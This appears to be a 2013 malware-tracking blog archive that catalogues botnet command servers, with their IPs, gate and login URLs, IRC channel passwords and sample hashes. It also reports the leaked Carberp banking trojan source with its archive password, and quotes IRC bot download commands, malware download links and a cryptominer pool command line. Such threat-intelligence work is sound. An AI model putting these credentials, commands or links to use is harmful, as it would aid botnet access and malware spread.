Month: June 2013

zbraaadanstfesse.org (Pony loader hosted by chicagovps.net)

Resolved zbraaadanstfesse.org to 172.245.5.137 Server:  zbraaadanstfesse.org Gate file:  /p/stats.php This is currently being downloaded by this citadel net. This is also a backup domain for a betabot, and is the domain currently used by it. Betabot login: hxxp://zbraaadanstfesse.org/~.poto/login.php Related md5s (Search on malwr.com for samples): 7ec71449228f4209b9df59bb68ec3a5f Hosting infos: http://whois.domaintools.com/172.245.5.137

x.fullhdizle.co (Irc botnet hosted by hostforweb.net)

Resolved x.fullhdizle.co to 216.246.77.143 Server:  x.fullhdizle.co Port:  1989 Server password:  r00t33 Channel:  #xxx Channel password:  r00t33 Topic for #xxx is: !open hxxp://www.fullhdizle.coTopic for #xxx set by Coder at Wed Jun 26 14:02:37 2013 Related md5s (search on malwr.com to download the samples): 8cbdc21108b468ecd95644f18b83324d Hosting infos: http://whois.domaintools.com/216.246.77.143

158.255.2.59 (Athena irc botnet hosted by hostkey.com)

Server:  158.255.2.59 Port:  6667 Current local users 436, max 2038 Channel:  #network #network         411  Related md5s (search on malwr.com to download the samples): 891905810486c6dee6d246f9845fb5cd Hosting infos: http://whois.domaintools.com/158.255.2.59

Carberp The Banking Trojan Source Now Available To Public

First Zeus now Carberp source are leaked to public Picture from dk forum Source and passwd for the rar archive are available via twitter thnx to ivanlef0u Another link for the source here(around 1.88GB) Password for the archive: “Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh”

srv1.su (Betabot http botnet hosted by softronics.ch)

Resolved srv1.su to 94.242.198.65 Server:  srv1.su Gate file:  /b/order.php Everyone should congratulate snk, who has taken his first baby steps into the 21st century by using a http bot. Unfortunately for him he chose to use the l33t Hackforums bot Betabot with a 1mb stub Autoit crypter, but I guess he can only manage to

srv1.su(snk’s botnet hosted in Luxembourg Steinsel Root Sa)

The bot is downloaded by this autoit sample: hxxp://sglegacy.com/AA/dava.exe wich looks like http autoit downloader login here: hxxp://www.sglegacy.com/AA/index.php/login another sample downloaded from the dava.ese is this: hxxp://la-majeur.com/images/beta.exe( Betabot) here dava.exe decompiled: $at2 = “0” $at5 = 0 $at1 = “0” $at3 = “0” $avm = “0” $asb = “0” $at4 = “0” #NoTrayIcon #Region #AutoIt3Wrapper_UseUpx=n

y.osej36.com (Irc botnet hosted by gandi.net)

Resolved y.osej36.com to 92.243.8.222 Server:  y.osej36.com Port:  80 Server password:  passwd Channel:  #root Channel password:  redem !NAZEL hxxp://www12.0zz0.com/2013/06/21/20/723860853.png a392564eae140562e4b27d0ab078ba1e !NAZEL hxxp://upload.tehran98.com/img1/9kxogpyfckk2xwuzzn6j.png a392564eae140562e4b27d0ab078ba1e !s -n A modified ircd is used, so you may have trouble connecting. Alternate domains: y.v23sdy.com y.rwt234.com Bitcoin mining info:  minerd.exe -a scrypt -s 20 –no-longpoll -q -o za.oisdj.com:443 -u anonymous.1 -p -x